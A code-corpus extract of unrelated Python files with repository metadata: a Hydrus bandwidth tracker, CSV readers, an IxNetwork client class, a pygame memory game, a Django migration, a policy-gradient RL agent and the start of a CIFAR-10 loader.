def _GetUsage( self, bandwidth_type, time_delta, for_user ):
if for_user and time_delta is not None and bandwidth_type == HC.BANDWIDTH_TYPE_DATA and time_delta <= self.MIN_TIME_DELTA_FOR_USER:
usage = self._GetWeightedApproximateUsage( time_delta )
else:
usage = self._GetRawUsage( bandwidth_type, time_delta )
self._MaintainCache()
return usage
def _GetWeightedApproximateUsage( self, time_delta ):
SEARCH_DELTA = self.MIN_TIME_DELTA_FOR_USER
counter = self._seconds_bytes
now = HydrusData.GetNow()
since = now - SEARCH_DELTA
valid_timestamps = [ timestamp for timestamp in counter.keys() if since <= timestamp <= now ]
if len( valid_timestamps ) == 0:
return 0
# If we want the average speed over past five secs but nothing has happened in sec 4 and 5, we don't want to count them
# otherwise your 1MB/s counts as 200KB/s
earliest_timestamp = min( valid_timestamps )
SAMPLE_DELTA = max( now - earliest_timestamp, 1 )
total_bytes = sum( ( counter[ timestamp ] for timestamp in valid_timestamps ) )
time_delta_average_per_sec = total_bytes / SAMPLE_DELTA
return time_delta_average_per_sec * time_delta
def _MaintainCache( self ):
if HydrusData.TimeHasPassed( self._next_cache_maintenance_timestamp ):
now = HydrusData.GetNow()
oldest_second = now - self.MAX_SECONDS_TIME_DELTA
oldest_minute = now - self.MAX_MINUTES_TIME_DELTA
oldest_hour = now - self.MAX_HOURS_TIME_DELTA
oldest_day = now - self.MAX_DAYS_TIME_DELTA
def clear_counter( counter, oldest_timestamp ):
bad_keys = [ timestamp for timestamp in counter.keys() if timestamp < oldest_timestamp ]
for bad_key in bad_keys:
del counter[ bad_key ]
clear_counter( self._days_bytes, oldest_day )
clear_counter( self._days_requests, oldest_day )
clear_counter( self._hours_bytes, oldest_hour )
clear_counter( self._hours_requests, oldest_hour )
clear_counter( self._minutes_bytes, oldest_minute )
clear_counter( self._minutes_requests, oldest_minute )
clear_counter( self._seconds_bytes, oldest_second )
clear_counter( self._seconds_requests, oldest_second )
self._next_cache_maintenance_timestamp = HydrusData.GetNow() + self.CACHE_MAINTENANCE_TIME_DELTA
def GetCurrentMonthSummary( self ):
with self._lock:
num_bytes = self._GetUsage( HC.BANDWIDTH_TYPE_DATA, None, True )
num_requests = self._GetUsage( HC.BANDWIDTH_TYPE_REQUESTS, None, True )
return 'used ' + HydrusData.ToHumanBytes( num_bytes ) + ' in ' + HydrusData.ToHumanInt( num_requests ) + ' requests this month'
def GetMonthlyDataUsage( self ):
with self._lock:
result = []
for ( month_time, usage ) in list(self._months_bytes.items()):
month_dt = datetime.datetime.utcfromtimestamp( month_time )
# this generates zero-padded month, to keep this lexicographically sortable at the gui level
date_str = month_dt.strftime( '%Y-%m' )
result.append( ( date_str, usage ) )
result.sort()
return result
def GetUsage( self, bandwidth_type, time_delta, for_user = False ):
with self._lock:
if time_delta == 0:
return 0
return self._GetUsage( bandwidth_type, time_delta, for_user )
def GetWaitingEstimate( self, bandwidth_type, time_delta, max_allowed ):
with self._lock:
if time_delta is None: # this is monthly
dt = self._GetCurrentDateTime()
( year, month ) = ( dt.year, dt.month )
next_month_year = year
if month == 12:
next_month_year += 1
next_month = ( month % 12 ) + 1
next_month_dt = datetime.datetime( next_month_year, next_month, 1 )
next_month_time = int( calendar.timegm( next_month_dt.timetuple() ) )
return HydrusData.GetTimeDeltaUntilTime( next_month_time )
else:
# we want the highest time_delta at which usage is >= than max_allowed
# time_delta subtract that amount is the time we have to wait for usage to be less than max_allowed
# e.g. if in the past 24 hours there was a bunch of usage 16 hours ago clogging it up, we'll have to wait ~8 hours
( window, counter ) = self._GetWindowAndCounter( bandwidth_type, time_delta )
time_delta_in_which_bandwidth_counts = time_delta + window
time_and_values = list( counter.items() )
time_and_values.sort( reverse = True )
now = HydrusData.GetNow()
usage = 0
for ( timestamp, value ) in time_and_values:
current_search_time_delta = now - timestamp
if current_search_time_delta > time_delta_in_which_bandwidth_counts: # we are searching beyond our time delta. no need to wait
break
usage += value
if usage >= max_allowed:
return time_delta_in_which_bandwidth_counts - current_search_time_delta
return 0
def ReportDataUsed( self, num_bytes ):
with self._lock:
dt = self._GetCurrentDateTime()
( month_time, day_time, hour_time, minute_time, second_time ) = self._GetTimes( dt )
self._months_bytes[ month_time ] += num_bytes
self._days_bytes[ day_time ] += num_bytes
self._hours_bytes[ hour_time ] += num_bytes
self._minutes_bytes[ minute_time ] += num_bytes
self._seconds_bytes[ second_time ] += num_bytes
self._MaintainCache()
def ReportRequestUsed( self, num_requests = 1 ):
with self._lock:
dt = self._GetCurrentDateTime()
( month_time, day_time, hour_time, minute_time, second_time ) = self._GetTimes( dt )
self._months_requests[ month_time ] += num_requests
self._days_requests[ day_time ] += num_requests
self._hours_requests[ hour_time ] += num_requests
self._minutes_requests[ minute_time ] += num_requests
self._seconds_requests[ second_time ] += num_requests
self._MaintainCache()
HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_BANDWIDTH_TRACKER ] = BandwidthTracker
|
[
"hydrus.admin@gmail.com"
] |
hydrus.admin@gmail.com
|
21ec36ee3a016d32669ac9d1be8b28dba85bb29c
|
7bc201562c3180a26438cccdb6d36c80361b848d
|
/IUM/utils/readers/pandas_reader.py
|
7032aec89b005c736442b1378659efd2cfe8599a
|
[] |
no_license
|
steciuk/IUM-recommendation-system
|
6615aa3bcdd6b367ab9ef4b85319ad4e95d68e57
|
528649ed5d1ee1b9ab1ace4980ff09d8234ef6e6
|
refs/heads/main
| 2023-03-22T13:03:33.505086
| 2021-03-18T17:33:43
| 2021-03-18T17:33:43
| 314,654,026
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 524
|
py
|
import pandas as pd
from definitions import ROOT_DIR
def read_users():
with open(f'{ROOT_DIR}/data/ver3/users.csv', encoding='utf-8') as f:
data = pd.read_csv(f)
f.close()
return data
def read_products():
with open(f'{ROOT_DIR}/data/ver3/products.csv', encoding='utf-8') as f:
data = pd.read_csv(f)
f.close()
return data
def read_sessions():
with open(f'{ROOT_DIR}/data/ver3/sessions.csv', encoding='utf-8') as f:
data = pd.read_csv(f)
f.close()
return data
|
[
"steciuk77@gmail.com"
] |
steciuk77@gmail.com
|
8b4cad1be68e2f4fcefaf8bf77548f5a8969fafe
|
b144c5142226de4e6254e0044a1ca0fcd4c8bbc6
|
/ixnetwork_restpy/testplatform/sessions/ixnetwork/impairment/profile/fixedclassifier/fixedclassifier.py
|
f4d28d081bb4e76412d0bede32333114ae5ce943
|
[
"MIT"
] |
permissive
|
iwanb/ixnetwork_restpy
|
fa8b885ea7a4179048ef2636c37ef7d3f6692e31
|
c2cb68fee9f2cc2f86660760e9e07bd06c0013c2
|
refs/heads/master
| 2021-01-02T17:27:37.096268
| 2020-02-11T09:28:15
| 2020-02-11T09:28:15
| 239,721,780
| 0
| 0
|
NOASSERTION
| 2020-02-11T09:20:22
| 2020-02-11T09:20:21
| null |
UTF-8
|
Python
| false
| false
| 4,408
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class FixedClassifier(Base):
"""Specifies the packets to apply this profile to. If there are multiple patterns enabled, they are ANDed: each packet must match all packets in order to be impaired by this profile.
The FixedClassifier class encapsulates a list of fixedClassifier resources that is be managed by the user.
A list of resources can be retrieved from the server using the FixedClassifier.find() method.
The list can be managed by the user by using the FixedClassifier.add() and FixedClassifier.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'fixedClassifier'
def __init__(self, parent):
super(FixedClassifier, self).__init__(parent)
@property
def Pattern(self):
"""An instance of the Pattern class.
Returns:
obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.impairment.profile.fixedclassifier.pattern.pattern.Pattern)
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.impairment.profile.fixedclassifier.pattern.pattern import Pattern
return Pattern(self)
def add(self):
"""Adds a new fixedClassifier node on the server and retrieves it in this instance.
Returns:
self: This instance with all currently retrieved fixedClassifier data using find and the newly added fixedClassifier data available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._create(locals())
def remove(self):
"""Deletes all the fixedClassifier data in this instance from server.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self):
"""Finds and retrieves fixedClassifier data from the server.
All named parameters support regex and can be used to selectively retrieve fixedClassifier data from the server.
By default the find method takes no parameters and will retrieve all fixedClassifier data from the server.
Returns:
self: This instance with matching fixedClassifier data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of fixedClassifier data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the fixedClassifier data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
|
[
"srvc_cm_packages@keysight.com"
] |
srvc_cm_packages@keysight.com
|
678d22bbbc45af9180741f592078ac3728b94c06
|
fa7f72fe2369733f8f97d2324d8e236deb6eab39
|
/Python/memory_puzzle.py
|
05c22e82d2331d3201b6f93d0b0bb2058c3c1533
|
[
"CC0-1.0"
] |
permissive
|
Gulnaz-Tabassum/hacktoberfest2021
|
bd296832f7ff07712b0b4671a8bd841d645abc29
|
ffee073f6efa4090244b55966fd69dde51be12f1
|
refs/heads/master
| 2023-08-17T13:18:17.557965
| 2021-10-08T09:52:19
| 2021-10-08T09:52:19
| 414,930,631
| 2
| 0
|
CC0-1.0
| 2021-10-08T09:52:20
| 2021-10-08T09:47:37
| null |
UTF-8
|
Python
| false
| false
| 7,829
|
py
|
import random,pygame,sys
from pygame.locals import *
fps=30
wnwidth=640
wnheight=480
revelspeed=8
boxsize=40
gapsize=10
boardwidth=10
boardheight=7
assert (boardwidth*boardheight)%2==0,'Board need to have even number of boxes for pair of matches.'
xmargin=int((wnwidth-(boardwidth*(boxsize+gapsize)))/2)
ymargin=int((wnheight-(boardheight*(boxsize+gapsize)))/2)
gray=(100,100,100)
navyblue=(60,60,100)
white=(255,255,255)
red=(255,0,0)
green=(0,255,0)
blue=(0,0,255)
yellow=(255,255,0)
orange=(255,128,0)
purple=(255,0,255)
cyan=(0,255,255)
bgcolor=navyblue
lightbgcolor=gray
boxcolor=white
highlightcolor=blue
Donut='donut'
Square='square'
Diamond='diamond'
Lines='lines'
Oval='oval'
allcolor=(red,green,blue,yellow,orange,purple,cyan)
allshape=(Donut,Square,Diamond,Lines,Oval)
assert len(allcolor)*len(allshape)*2>=boardwidth*boardheight,"Board is too big for the number of shapes/colors defined"
def main():
global fpsclock,Display
pygame.init()
fpsclock=pygame.time.Clock()
Display=pygame.display.set_mode((wnwidth,wnheight))
mousex=0
mousey=0
pygame.display.set_caption(("Memory Puzzle"))
mainboard=getRandomizedBoard()
revealedboxes=generateRevealedBoxesData(False)
firstselection=None
Display.fill(bgcolor)
startGameAnimation(mainboard)
while True:
mouseclicked=False
Display.fill(bgcolor)
drawBoard(mainboard,revealedboxes)
for event in pygame.event.get():
if event.type==QUIT or (event.type==KEYUP and event.key==K_ESCAPE):
pygame.quit()
sys.exit()
elif event.type==MOUSEBUTTONUP:
mousex,mousey=event.pos
mouseclicked=True
boxx,boxy=getBoxAtPixel(mousex,mousey)
if boxx!=None and boxy!=None:
if not revealedboxes[boxx][boxy]:
drawHighlightBox(boxx,boxy)
if not revealedboxes[boxx][boxy] and mouseclicked:
revealBoxesAnimation(mainboard,[(boxx,boxy)])
revealedboxes[boxx][boxy]=True
if firstselection==None:
firstselection=(boxx,boxy)
else:
icon1shape,icon1color=getShapeAndColor(mainboard,firstselection[0],firstselection[1])
icon2shape,icon2color=getShapeAndColor(mainboard,boxx,boxy)
if icon1shape!=icon2shape or icon1color!=icon2color:
pygame.time.wait(1000)
coverBoxesAnimation(mainboard,[(firstselection[0],firstselection[1]),(boxx,boxy)])
revealedboxes[firstselection[0]][firstselection[1]]=False
revealedboxes[boxx][boxy]=False
elif hasWon(revealedboxes):
gameWonAnimation(mainboard)
pygame.time.wait(1000)
mainboard=getRandomizedBoard()
revealedboxes=generateRevealedBoxesData(False)
drawBoard(mainboard,revealedboxes)
pygame.display.update()
pygame.time.wait(1000)
startGameAnimation(mainboard)
firstselection=None
pygame.display.update()
fpsclock.tick(fps)
def generateRevealedBoxesData(val):
revealedboxes=[]
for i in range(boardwidth):
revealedboxes.append([val]*boardheight)
return revealedboxes
def getRandomizedBoard():
icons=[]
for color in allcolor:
for shape in allshape:
icons.append( (shape,color) )
random.shuffle(icons)
numIconsUsed= int(boardwidth*boardheight/2)
icons=icons[:numIconsUsed]*2
random.shuffle(icons)
board=[]
for x in range(boardwidth):
column=[]
for y in range(boardheight):
column.append(icons[0])
del icons[0]
board.append(column)
return board
def splitIntoGroupOf(groupsize,thelist):
result=[]
for i in range(0,len(thelist),groupsize):
result.append(thelist[i:i+groupsize])
return result
def leftTopCoordsOfBox(boxx,boxy):
left=boxx*(boxsize+gapsize)+xmargin
top=boxy*(boxsize+gapsize)+ymargin
return (left,top)
def getBoxAtPixel(x,y):
for boxx in range(boardwidth):
for boxy in range(boardheight):
left,top=leftTopCoordsOfBox(boxx,boxy)
boxRect=pygame.Rect(left,top,boxsize,boxsize)
if boxRect.collidepoint(x,y):
return (boxx,boxy)
return (None,None)
def drawIcon(shape,color,boxx,boxy):
quarter=int(boxsize*0.25)
half=int(boxsize*0.5)
left,top=leftTopCoordsOfBox(boxx,boxy)
if shape==Donut:
pygame.draw.circle(Display,color,(left+half,top+half),half-5)
pygame.draw.circle(Display,bgcolor,(left+half,top+half),quarter-5)
elif shape==Square:
pygame.draw.rect(Display,color,(left+quarter,top+quarter,boxsize-half,boxsize-half))
elif shape==Diamond:
pygame.draw.polygon(Display,color,((left+half,top),(left+boxsize-1,top+half),(left+half,top+boxsize-1),(left,top+half)))
elif shape==Lines:
for i in range(0,boxsize,4):
pygame.draw.line(Display,color,(left,top+i),(left+i,top))
pygame.draw.line(Display,color,(left+i,top+boxsize-1),(left+boxsize-1,top+i))
elif shape==Oval:
pygame.draw.ellipse(Display,color,(left,top+quarter,boxsize,half))
def getShapeAndColor(board,boxx,boxy):
return board[boxx][boxy][0],board[boxx][boxy][1]
def drawBoxCover(board,boxes,coverage):
for box in boxes:
left,top=leftTopCoordsOfBox(box[0],box[1])
pygame.draw.rect(Display,bgcolor,(left,top,boxsize,boxsize))
shape,color=getShapeAndColor(board,box[0],box[1])
drawIcon(shape,color,box[0],box[1])
if coverage>0:
pygame.draw.rect(Display,bgcolor,(left,top,coverage,boxsize))
pygame.display.update()
fpsclock.tick(fps)
def revealBoxesAnimation(board,boxesToReveal):
for coverage in range(boxsize,(-revelspeed)-1,-revelspeed):
drawBoxCover(board,boxesToReveal,coverage)
def coverBoxesAnimation(board,boxesToCover):
for coverage in range(0,boxsize+revelspeed,revelspeed):
drawBoxCover(board,boxesToCover,coverage)
def drawBoard(board,revealed):
for boxx in range(boardwidth):
for boxy in range(boardheight):
left,top=leftTopCoordsOfBox(boxx,boxy)
if not revealed[boxx][boxy]:
pygame.draw.rect(Display,boxcolor,(left,top,boxsize,boxsize))
shape,color=getShapeAndColor(board,boxx,boxy)
drawIcon(shape,color,boxx,boxy)
def drawHighlightBox(boxx,boxy):
left,top=leftTopCoordsOfBox(boxx,boxy)
pygame.draw.rect(Display,highlightcolor,(left-5,top-5,boxsize+10,boxsize+10),4)
def startGameAnimation(board):
coveredBoxes=generateRevealedBoxesData(False)
boxes=[]
for x in range(boardwidth):
for y in range(boardheight):
boxes.append((x,y))
random.shuffle(boxes)
boxGroups= splitIntoGroupOf(8,boxes)
drawBoard(board,coveredBoxes)
for boxGroup in boxGroups:
revealBoxesAnimation(board,boxGroup)
coverBoxesAnimation(board,boxGroup)
def gameWonAnimation(board):
coveredBoxes=generateRevealedBoxesData(True)
color1=lightbgcolor
color2=bgcolor
for i in range(13):
color1,color2=color2,color1
Display.fill(color1)
drawBoard(board,coveredBoxes)
pygame.display.update()
pygame.time.wait(300)
def hasWon(revealedBoxes):
for i in revealedBoxes:
if False in i:
return False
return True
if __name__=='__main__':
main()
|
[
"mishrajitendra227@gmail.com"
] |
mishrajitendra227@gmail.com
|
3b426af60e4124804c4a06843f6ed5f94cda8311
|
a964615ecce097846f8e36d338394c54802cf790
|
/sit_il/models/rl/npg/vpg/vpg_continuous_agent.py
|
f33848319b6f4c81eab6a0c08f08967b631e53fa
|
[] |
no_license
|
edwardyulin/sit_project
|
c0b3333252090408637846c1f4b6f2e1e6e9f574
|
dd3e877c0ad281e39af2df68ab5c002d83677ccc
|
refs/heads/master
| 2023-09-05T17:37:58.371763
| 2021-10-29T07:59:54
| 2021-10-29T07:59:54
| 414,883,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,107
|
py
|
#imports
from typing import List, Optional, Tuple, Any, Dict, Union
import tempfile
from pathlib import Path
import numpy as np
from dataclasses import field, dataclass
import pandas as pd
import gym
import wandb
import tensorflow as tf
from tensorflow.keras.utils import plot_model
from sit_il.models.rl.npg.vpg.mlp_critic import MLPCritic
from sit_il.models.rl.npg.vpg.mlp_continuous_actor import MLPContinuousActor
from sit_il.helpers import compute_discounted_return
@dataclass
class Trajectories:
""" Storing trajectories """
# observation is represented as an array of [car_position, car_velocity]
observations: List[np.ndarray] = field(default_factory=list)
# action is represented as a float in the range of [-1.0, 1.0]
actions: List[float] = field(default_factory=list)
# critic value from the output of the critic network
critic_values: List[float] = field(default_factory=list)
# reward of 100 is awarded if the agent reached the flag (position = 0.45) on top of the mountain.
# reward is decrease based on amount of energy consumed each step.
rewards: List[float] = field(default_factory=list)
def append(self,
observation: np.ndarray,
action: float,
critic_value: float,
reward: float
) -> None:
self.observations.append(observation)
self.actions.append(action)
self.critic_values.append(critic_value)
self.rewards.append(reward)
class VPGContinuousAgent:
""" Vanilla Policy Gradient agent for environments with continuous actions space """
actor: MLPContinuousActor
critic: MLPCritic
def __init__(self,
env: gym.Env
):
""" Define variables for VPGContinuousAgent"""
self.model_name = self.__class__.__name__
self.env = env
self.observation_size = self.env.observation_space.shape[0]
self.action_size = self.env.action_space.shape[0]
self.is_in_wandb_session = False
self.config: Dict[str, Union[int, float, str]] = {}
self.history: Dict[str, List[Union[int, float]]] = {
"episode": [],
"count_steps": [],
"total_reward": [],
"actor_loss": [],
"critic_loss": []
}
def pipeline(self,
actor_hidden_units: List[int],
critic_hidden_units: List[int],
actor_learning_rate: float,
critic_learning_rate: float,
n_train_episodes: int,
max_episode_length: int,
discount_rate: float,
n_test_episodes: int,
print_summary: bool,
plot_actor_network_to_file: Optional[Path],
plot_critic_network_to_file: Optional[Path],
save_actor_network_to_file: Optional[Path],
save_critic_network_to_file: Optional[Path],
load_actor_network_from_file: Optional[Path],
load_critic_network_from_file: Optional[Path]
) -> None:
"""Run the pipeline including building, training, and testing the agent."""
with wandb.init(
project="sit_vpg_door",
entity="edward_lin",
tags=[self.model_name],
resume=False,
config={
"env_name": self.env.spec.id,
"observation_size": self.observation_size,
"action_size": self.action_size,
"actor_hidden_units": actor_hidden_units,
"critic_hidden_units": critic_hidden_units,
"actor_learning_rate": actor_learning_rate,
"critic_learning_rate": critic_learning_rate,
"n_train_episodes": n_train_episodes,
"max_episode_length": max_episode_length,
"discount_rate": discount_rate,
"n_test_episodes": n_test_episodes,
},
):
self.is_in_wandb_session = True
self.config = wandb.config
if load_actor_network_from_file and load_critic_network_from_file:
# load actor and critic networks instead of training
self.load(load_actor_network_from_file, load_critic_network_from_file)
else:
# build actor and critic networks
self.build(
observation_size=self.config["observation_size"],
action_size=self.config["action_size"],
actor_hidden_units=self.config["actor_hidden_units"],
critic_hidden_units=self.config["critic_hidden_units"],
actor_learning_rate=self.config["actor_learning_rate"],
critic_learning_rate=self.config["critic_learning_rate"],
)
# visualize model architecture
if print_summary:
self.summary()
# drawing the structures of actor and critic networks to file
# note that actor network is different between continuous and discrete action space
actor_plot_file, critic_plot_file = self.render_networks(
plot_actor_network_to_file,
plot_critic_network_to_file
)
# log the images of networks onto wandb
wandb.log(
{
"actor_architecture": wandb.Image(str(actor_plot_file)),
"critic_architecture": wandb.Image(str(critic_plot_file))
}
)
# train the agent
self.fit(
n_episodes=self.config["n_train_episodes"],
max_episode_length=self.config["max_episode_length"],
discount_rate=self.config["discount_rate"]
)
# save after training
if save_actor_network_to_file and save_critic_network_to_file:
self.save(save_actor_network_to_file, save_critic_network_to_file)
# evaluate the agent and log results onto wandb
results = self.evaluate(n_episodes=n_test_episodes)
# An episode succeed if "what"
print(
"Evaluation results:\n"
" count_steps: "
f"{results['count_steps_mean']:.4f} ยฑ {results['count_steps_std']:.4f}\n"
" total_reward: "
f"{results['total_reward_mean']:.4f} ยฑ {results['total_reward_std']:.4f}",
)
# Log evaluation results
wandb.log(
{
"evaluation_results": wandb.Table(
dataframe=pd.DataFrame(results, index=[0])
)
}
)
self.is_in_wandb_session = False # finished logging on wandb
def build(self,
observation_size: int,
action_size: int,
actor_hidden_units: List[int],
critic_hidden_units: List[int],
actor_learning_rate: float,
critic_learning_rate: float,
load_bc_network: Optional[Path]
) -> None:
""" Construct actor network and critic network """
self.actor = MLPContinuousActor()
self.actor.build(
observation_size=observation_size, #input of the network
output_size=action_size, # output of one float value to represent the action (instead of prob. of actions seen in discrete)
hidden_units=actor_hidden_units,
learning_rate=actor_learning_rate,
load_bc_network=load_bc_network
)
self.critic = MLPCritic()
self.critic.build(
obs_size=observation_size,
hidden_units=critic_hidden_units,
learning_rate=critic_learning_rate,
)
def summary(self) -> None:
""" Print the summary of the actor and critic networks """
print("Actor network:")
print(self.actor.model.summary())
print()
print("=======================")
print("Critic network:")
print(self.critic.model.summary())
def render_networks(self,
actor_to_file: Optional[Path] = None,
critic_to_file: Optional[Path] = None
) -> Tuple[Any, Any]:
""" Visualize the structure (input, hidden, output) of actor and critic networks"""
if actor_to_file is None:
_, temp_file = tempfile.mkstemp(suffix=".jpg")
actor_to_file = Path(temp_file) # find the path of temp_file
if critic_to_file is None:
_, temp_file = tempfile.mkstemp(suffix=".jpg")
critic_to_file = Path(temp_file) # find the path of temp_file
plot_model(
self.actor.model,
to_file=actor_to_file,
show_shapes=True,
show_dtype=True
),
plot_model(
self.critic.model,
to_file=critic_to_file,
show_shapes=True,
show_dtype=True
)
return actor_to_file, critic_to_file
def normalize_data(self,
data: np.ndarray):
max_value = 2
min_value = -1
norm = np.clip(data, min_value, max_value)
return norm
def fit(self,
n_episodes: int,
max_episode_length: int,
discount_rate: int
) -> None:
""" Train the agent"""
for episode in range(n_episodes):
observation = self.env.reset()
step = 0
total_reward = 0.0
done = False
print("Initial State: ", observation)
trajectories = Trajectories()
while not done:
step += 1
if step > max_episode_length:
break
# selecting an action
# observation = [
# [ s1, s2 ]
# ] -> action = [
# [ a1 ], (-1 <= a1 <= 1)
# ]
action = self.actor.model.predict(np.atleast_2d(np.squeeze(observation)))
# only take the first argument, don't need batch_size
action = self.normalize_data(action[0])
#print(action)
next_observation, reward, done, _ = self.env.step(action)
critic_value = self.critic.model.predict(np.atleast_2d(np.squeeze(observation)))[0, 0]
total_reward += reward
trajectories.append(
observation=np.squeeze(observation),
action=action,
critic_value=critic_value,
reward=reward
)
observation = next_observation
# Compute rewards-to-go (= discounted_returns) (Pseudocode line 4)
# Rewards-to-go: a weighted sum of all the rewards for all steps in the episode
discounted_returns = compute_discounted_return(
rewards=trajectories.rewards,
discount_rate=discount_rate
)
# Compute advantage estimate (Pseudocode line 5)
advantages = np.subtract(discounted_returns, trajectories.critic_values)
# Calculate actor loss (Pseudocode line 6-7)
actor_loss = self.actor.fit(
observations=np.atleast_2d(trajectories.observations),
actions=trajectories.actions,
advantages=advantages
)
# Calculate critic loss (Pseudocode line 8)
critic_loss = self.critic.fit(
obs=np.atleast_2d(trajectories.observations),
discounted_returns=np.expand_dims(discounted_returns, axis=1)
)
# log training results
self._log_history(episode, step, total_reward, actor_loss, critic_loss)
def evaluate(self,
n_episodes: int
) -> Dict[str, float]:
"""Evaluate the agent"""
count_steps_history = []
total_reward_history = []
for episode in range(n_episodes):
observation = self.env.reset()
step = 0
total_reward = 0.0
done = False
while not done:
action = self.act(observation)
action = self.normalize_data(action)
new_observation, reward, done, _ = self.env.step(action)
self.env.render()
step += 1
total_reward += reward
observation = new_observation
print(
f"Episode {episode}:\n"
f" count_steps = {step}\n"
f" total_reward = {total_reward}",
)
print()
count_steps_history.append(step)
total_reward_history.append(total_reward)
return {
"count_steps_mean": np.mean(count_steps_history),
"count_steps_std": np.std(count_steps_history),
"total_reward_mean": np.mean(total_reward_history),
"total_reward_std": np.std(total_reward_history),
}
def act(self,
observation: np.ndarray
) -> np.ndarray:
"""Return an action given the input observation"""
return self.actor.model.predict(np.atleast_2d(np.squeeze(observation)))[0]
def _log_history(self,
episode: int,
count_steps: int,
total_reward: float,
actor_loss: float,
critic_loss: float
) -> None:
"""Log training restuls """
self.history["episode"].append(episode)
self.history["count_steps"].append(count_steps)
self.history["total_reward"].append(total_reward)
self.history["actor_loss"].append(actor_loss)
self.history["critic_loss"].append(critic_loss)
if self.is_in_wandb_session:
# Log relevant graphs on wandb
wandb.log(
{
"episode": episode,
"count_steps": count_steps,
"total_reward": total_reward,
"actor_loss": actor_loss,
"critic_loss": critic_loss,
},
)
def save(self, actor_to_file: Path, critic_to_file: Path)->None:
"""Save the actor and critic to file."""
self.actor.save(actor_to_file)
self.critic.save(critic_to_file)
def load(self, actor_from_file: Path, critic_from_file: Path) ->None:
"""Load the actor and critic."""
self.actor = tf.keras.models.load_model(actor_from_file)
self.critic = tf.keras.models.load_model(critic_from_file)
|
[
"67679083+edwardyulin@users.noreply.github.com"
] |
67679083+edwardyulin@users.noreply.github.com
|
58b3db9657a0382c8a7ea0ee22ebded1e7d0734f
|
de392462a549be77e5b3372fbd9ea6d7556f0282
|
/accounts/migrations/0129_auto_20210526_0952.py
|
1c06372188954ab5ff13971cdb0cf2f166006a10
|
[] |
no_license
|
amutebe/AMMS_General
|
2830770b276e995eca97e37f50a7c51f482b2405
|
57b9b85ea2bdd272b44c59f222da8202d3173382
|
refs/heads/main
| 2023-07-17T02:06:36.862081
| 2021-08-28T19:07:17
| 2021-08-28T19:07:17
| 400,064,408
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
# Generated by Django 3.2.3 on 2021-05-26 06:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0128_auto_20210520_1129'),
]
operations = [
migrations.AlterField(
model_name='car',
name='car_number',
field=models.CharField(default='TEGA26052021770', max_length=200, primary_key=True, serialize=False, verbose_name='Corrective action no.:'),
),
migrations.AlterField(
model_name='employees',
name='employeeID',
field=models.CharField(default='TEGA831', max_length=10, primary_key=True, serialize=False, verbose_name='Employee ID'),
),
]
|
[
"mutebe2@gmail.com"
] |
mutebe2@gmail.com
|
57fc7cebd01728f8421be44aefcb47b90b42b206
|
ef9effb573816b7678b8da5dda541f640cffc3e0
|
/data/CIFAR10_test_query.py
|
f104e3f691ddcc847dd486b75dbcffcbc6f075fd
|
[] |
no_license
|
yinianqingzhi/PQN
|
c0a3d835e9898803e8b056b45f0a5560c840165f
|
ba7724b8d97d8c42a44e61a2edd0a64e4f5be1ab
|
refs/heads/master
| 2020-04-07T19:46:07.102174
| 2018-11-22T07:52:05
| 2018-11-22T07:52:05
| 158,661,765
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,624
|
py
|
from __future__ import print_function
from PIL import Image
import os
import os.path
import numpy as np
import sys
if sys.version_info[0] == 2:
import cPickle as pickle
else:
import pickle
import torch.utils.data as data
# from .utils import download_url, check_integrity
import random
class CIFAR10_test_query(data.Dataset):
"""`CIFAR10 <https://www.cs.toronto.edu/~kriz/cifar.html>`_ Dataset.
Args:
root (string): Root directory of dataset where directory
``cifar-10-batches-py`` exists or will be saved to if download is set to True.
train (bool, optional): If True, creates dataset from training set, otherwise
creates from test set.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
download (bool, optional): If true, downloads the dataset from the internet and
puts it in root directory. If dataset is already downloaded, it is not
downloaded again.
"""
base_folder = 'cifar-10-batches-py'
url = "https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz"
filename = "cifar-10-python.tar.gz"
tgz_md5 = 'c58f30108f718f92721af3b95e74349a'
train_list = [
['data_batch_1', 'c99cafc152244af753f735de768cd75f'],
